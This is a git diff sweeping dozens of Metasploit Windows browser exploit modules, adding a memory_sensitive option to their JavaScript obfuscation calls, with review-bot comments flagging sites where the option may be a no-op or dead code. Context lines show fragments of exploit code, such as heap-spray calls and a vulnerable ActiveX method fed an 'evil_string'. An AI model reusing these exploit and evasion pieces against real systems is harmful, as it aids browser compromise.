modules/exploits/windows/browser/ultraoffice_httpupload.rb | 2 +- 
.../exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/browser/vlc_amv.rb | 2 +- modules/exploits/windows/browser/vlc_mms_bof.rb | 2 +- modules/exploits/windows/browser/webex_ucf_newobject.rb | 2 +- .../exploits/windows/browser/zenworks_helplauncher_exec.rb | 2 +- 66 files changed, 73 insertions(+), 73 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 84bc9cf971..894453c795 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -372,7 +372,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index b2d3ce686c..47e4357b4a 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index cab570badc..f82559de4e 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb 
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
 #Javascript obfuscation is optional
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"
diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index ab8329aab8..525c720023 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 return js
diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
index da040e12fd..d4f30b1dae 100644
--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -184,7 +184,7 @@ heapSpray(myoffset,myshellcode,myfillsled);
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 content = ""
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index ec9ff0db78..bf43b215f2 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -218,7 +218,7 @@ for (var i=0; i < 1600; i++) {
 #obfuscate on demand
 if datastore['OBFUSCATE']
 js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
- js_spray.obfuscate
+ js_spray.obfuscate(memory_sensitive: true)
 end
 else
 js_spray = <<-JS
diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
index 19c103ab84..c5766be2e3 100644
--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
 #obfuscate on demand
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 html = <<-EOS
diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
index 6f09ebd1d5..3302189b6e 100644
--- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb
+++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
 js.update_opts(js_heap_spray.opts)
- js.obfuscate()
+ js.obfuscate(memory_sensitive: true)
 content = %Q|
diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
index bb736f1946..50d942636a 100644
--- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
+++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
@@ -100,7 +100,7 @@ vulnerable.OnBeforeVideoDownload(evil_string);
 }
 js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
 js.update_opts(js_heap_spray.opts)
- js.obfuscate()
+ js.obfuscate(memory_sensitive: true)
 # Generate the final HTML
 content = %Q|
diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
index 8fe38efe5c..5cf4506565 100644
--- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
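Review bot: In athocgov_completeinstallation the object receiving `js.obfuscate(memory_sensitive: true)` is built with `::Rex::Exploitation::ObfuscateJS.new(js, opts)`, a different class from the `Rex::Exploitation::JSObfu` that the rest of this sweep targets; please confirm that ObfuscateJS#obfuscate actually recognises `:memory_sensitive`, because if it takes an options hash and ignores unknown keys the change is a silent no-op at this site, and if it takes no arguments it will raise ArgumentError at run time. The same ObfuscateJS pattern appears in the baofeng_storm_onbeforevideodownload hunk on this line and later in chilkat_crypt_writefile and ea_checkrequirements. If the option is not supported there, those four sites should be left out of this sweep or migrated to JSObfu in a separate change. The enclosing method starts and ends outside the hunk.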
@@ -118,7 +118,7 @@ window.location = "#{hcp_url}";
 }
 }
 js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
- js.obfuscate()
+ js.obfuscate(memory_sensitive: true)
 =end
 js = encrypt_js(js, @javascript_encode_key)
diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
index 55b5c6df4c..4eab9ed5b0 100644
--- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
+++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
 x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
 x.url = "#{url}/#{dir}/";
 |
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 html = "\n\t\n"
 print_status("Sending #{self.name}")
 send_response_html(cli, html)
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
index 5b35ecdef3..e971e292ec 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 end
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
index 199c27944b..7403874a11 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -398,7 +398,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 sploit = "http://"
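Review bot: The changed `js.obfuscate(memory_sensitive: true)` in chilkat_crypt_writefile is immediately followed by a context line `=end`, which strongly suggests the edited call sits inside a `=begin`/`=end` comment block (the opening `=begin` is outside the hunk, so this is inferred); if so, the line is dead code and the change has no runtime effect, while the live path continues at `js = encrypt_js(js, @javascript_encode_key)`. Commented-out code should either be excluded from a mechanical sweep like this or, better, removed in a follow-up so that future sweeps do not keep "fixing" it. The enclosing method starts and ends outside the hunk.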
diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb
index 58182c0a10..16fd7c4882 100644
--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 spray = heaplib(spray, {:noobfu => true})
 spray = ::Rex::Exploitation::JSObfu.new(spray)
- spray.obfuscate
+ spray.obfuscate(memory_sensitive: true)
 load = %Q|
 var d=document.getElementById("nsepadiv");
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 44636c8495..09ade0690c 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['OBFUSCATE']
 js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate(memory_sensitive: true)
 end
 return js
diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb
index 89936e7a39..5cd850b251 100644
--- a/modules/exploits/windows/browser/ea_checkrequirements.rb
+++ b/modules/exploits/windows/browser/ea_checkrequirements.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
 js.update_opts(js_heap_spray.opts)
- js.obfuscate()
+ js.obfuscate(memory_sensitive: true)
 content = %Q|